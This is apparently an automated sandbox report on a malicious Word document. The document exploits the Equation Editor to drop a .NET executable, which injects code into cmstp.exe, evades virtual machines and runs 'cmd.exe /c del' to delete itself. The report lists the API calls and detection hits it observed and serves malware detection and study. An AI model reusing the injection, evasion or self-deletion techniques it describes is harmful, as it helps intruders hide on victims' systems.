          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFC30 NtOpenProcess,5_2_00AAFC30
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFC48 NtSetInformationFile,5_2_00AAFC48
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB0C40 NtGetContextThread,5_2_00AB0C40
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB1D80 NtSuspendThread,5_2_00AB1D80
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFD5C NtEnumerateKey,5_2_00AAFD5C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFE24 NtWriteVirtualMemory,5_2_00AAFE24
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFFFC NtCreateProcessEx,5_2_00AAFFFC
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFF34 NtQueueApcThread,5_2_00AAFF34
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00146F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,5_2_00146F06
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00146F12 NtQueryInformationProcess,5_2_00146F12
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020100C4 NtCreateFile,LdrInitializeThunk,7_2_020100C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020107AC NtCreateMutant,LdrInitializeThunk,7_2_020107AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FAB8 NtQueryValueKey,LdrInitializeThunk,7_2_0200FAB8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0200FAD0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0200FAE8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FB50 NtCreateKey,LdrInitializeThunk,7_2_0200FB50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0200FB68
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0200FBB8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200F900 NtReadFile,LdrInitializeThunk,7_2_0200F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200F9F0 NtClose,LdrInitializeThunk,7_2_0200F9F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0200FED0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FFB4 NtCreateSection,LdrInitializeThunk,7_2_0200FFB4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0200FC60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FD8C NtDelayExecution,LdrInitializeThunk,7_2_0200FD8C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0200FDC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02010048 NtProtectVirtualMemory,7_2_02010048
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02010060 NtQuerySection,7_2_02010060
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02010078 NtResumeThread,7_2_02010078
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020110D0 NtOpenProcessToken,7_2_020110D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201010C NtOpenDirectoryObject,7_2_0201010C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02011148 NtOpenThread,7_2_02011148
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020101D4 NtSetValueKey,7_2_020101D4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FA20 NtQueryInformationFile,7_2_0200FA20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FA50 NtEnumerateValueKey,7_2_0200FA50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FBE8 NtQueryVirtualMemory,7_2_0200FBE8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200F8CC NtWaitForSingleObject,7_2_0200F8CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02011930 NtSetContextThread,7_2_02011930
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200F938 NtWriteFile,7_2_0200F938
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FE24 NtWriteVirtualMemory,7_2_0200FE24
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FEA0 NtReadVirtualMemory,7_2_0200FEA0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FF34 NtQueueApcThread,7_2_0200FF34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FFFC NtCreateProcessEx,7_2_0200FFFC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FC30 NtOpenProcess,7_2_0200FC30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02010C40 NtGetContextThread,7_2_02010C40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FC48 NtSetInformationFile,7_2_0200FC48
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FC90 NtUnmapViewOfSection,7_2_0200FC90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FD5C NtEnumerateKey,7_2_0200FD5C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02011D80 NtSuspendThread,7_2_02011D80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A85D0 NtCreateFile,7_2_000A85D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A8680 NtReadFile,7_2_000A8680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A8700 NtClose,7_2_000A8700
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A87B0 NtAllocateVirtualMemory,7_2_000A87B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A85CA NtCreateFile,7_2_000A85CA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A86FA NtClose,7_2_000A86FA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A87AA NtAllocateVirtualMemory,7_2_000A87AA
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: ashlyzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ashlkyvc7592.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$O-5433ERE.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD883.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/9@6/4
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
          Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: ashlyzx[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: ashlkyvc7592.exe.2.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.4.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.3.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.5.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.7.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.9.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.2.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_003412DD push esp; retn 002Dh4_2_00341321
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_00343652 push esp; retn 002Dh4_2_00343655
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B87C push eax; ret 5_2_0041B882
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B812 push eax; ret 5_2_0041B818
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B81B push eax; ret 5_2_0041B882
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004068A0 push es; retf 5_2_004068AF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0040697C push esi; ret 5_2_0040697D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00414406 push B75A778Ch; ret 5_2_0041440B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041CEBD push ebp; retf 5_2_0041CEBE
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B7C5 push eax; ret 5_2_0041B818
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00414FF5 push ecx; ret 5_2_00414FF6
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00415FFA push ecx; iretd 5_2_00416004
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABDFA1 push ecx; ret 5_2_00ABDFB4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201DFA1 push ecx; ret 7_2_0201DFB4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A4406 push B75A778Ch; ret 7_2_000A440B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AB7C5 push eax; ret 7_2_000AB818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AB81B push eax; ret 7_2_000AB882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AB812 push eax; ret 7_2_000AB818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AB87C push eax; ret 7_2_000AB882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000968A0 push es; retf 7_2_000968AF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A8913 push ds; retn 4797h7_2_000A891D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0009697C push esi; ret 7_2_0009697D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000ACEBD push ebp; retf 7_2_000ACEBE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A5FFA push ecx; iretd 7_2_000A6004
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A4FF5 push ecx; ret 7_2_000A4FF6
          Source: initial sampleStatic PE information: section name: .text entropy: 7.66317958598
          Source: initial sampleStatic PE information: section name: .text entropy: 7.66317958598
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ashlkyvc7592.exe PID: 1528, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
